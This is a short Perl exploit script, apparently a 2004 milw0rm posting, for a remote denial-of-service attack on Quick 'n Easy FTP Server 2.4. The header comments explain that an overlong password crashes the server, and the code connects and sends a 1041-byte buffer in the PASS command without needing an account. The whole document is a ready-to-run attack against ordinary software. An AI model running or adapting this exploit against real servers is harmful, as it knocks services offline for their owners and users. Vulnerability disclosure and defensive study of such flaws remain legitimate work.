#!/usr/local/bin/perl -w
## Quick 'n EasY VER 2.4 Ftp Server remote D.o.S
## Discovered,exploited by KaGra
## Tested on WinXP SP1 English version
## sENDING a big buffer in PASS,at least 1041 bytes
## will crash the sever,as long as the logfile on server
## is viewed or just at the time it will be viewed.This
## sploit works also for almost ALL commands (like APPE
## ,CWD etc),but as u understand,for them U should have at
## least a guest account.For this sploit,no account needed.
## PS:Many thankz to muts for the shellcode at Ability Server APPE sploit...
use Net::FTP;
$hostname = 'localhost'; #Remote Host to D.o.S!
$username = 'anonymous'; #AnythinG HeRe!
print "\n[*]BuiLDinG BuFfer...\n";
$password = 'A'x1041 ; #OverFlow BuffEr!
print "[*]ConnectinG To TarGet...\n";
$ftp = Net::FTP->new($hostname); # Connecting...
print "[*]SenDing DeViL...\n\n";
$ftp->login($username, $password); # Send EviL BuffeR...
print "SerVer Has Been Dosed,will be Down if LogFile is or will be viewed!\n";
# milw0rm.com [2004-10-24]